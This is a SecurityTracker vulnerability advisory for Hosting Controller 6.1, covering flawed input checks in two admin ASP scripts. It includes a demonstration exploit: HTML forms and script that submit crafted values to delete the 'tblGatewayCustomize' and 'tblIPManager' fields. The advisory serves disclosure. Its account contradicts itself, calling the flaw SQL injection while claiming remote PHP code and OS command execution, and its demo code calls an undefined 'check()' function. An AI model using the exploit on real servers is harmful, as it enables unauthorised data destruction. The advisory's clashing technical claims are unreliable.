SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Hosting Controller Vendors:   HostingController.com
Hosting Controller Input Validation Holes in 'AddGatewaySettings.asp' and 'IPManager.asp' Permit SQL Injection
SecurityTracker Alert ID:  1015584
SecurityTracker URL:  http://securitytracker.com/id/1015584
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Jan 2 2009
Original Entry Date:  Feb 6 2006
Impact:   Disclosure of system information, Disclosure of user information, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 6.1 Hotfix 2.8
Description:   Soroush Dalili from GrayHatz Security Group reported a vulnerability in Hosting Controller. A remote user can inject SQL commands.

The 'AddGatewaySettings.asp' and 'IPManager.asp' scripts do not properly validate user-supplied input. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A remote user can exploit this to delete the 'tblGatewayCustomize' and 'tblIPManager' fields.

A demonstration exploit is provided:

------------------Start--------------------
URL: <input name="url" value="" />
<br />
<script>
function check1(){
frm1.action = window.document.all.url.value + frm1.action
alert(frm1.action)
}
function check2(){
frm2.action = window.document.all.url.value + frm2.action
alert(frm2.action)
}
</script>
<br />
Delete tblGatewayCustomize fields
<br />
<form name="frm1" action="/AdminSettings/AddGatewaySettings.asp?action=add" method="post" onsubmit="check()">
GatewayID<input name="GatewayID" value="" />
<br />
<input type="submit" />
</form>
<br />
Delete tblIPManager fields
<br />
<form name="frm2" action="/AdminSettings/IPManager.asp?Mode=1" method="post">
IP<input name="IP" value="" />
<br />
<input type="submit" />
</form>
-----------------End---------------------

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.hostingcontroller.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents



[Original Message Not Available for Viewing]


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC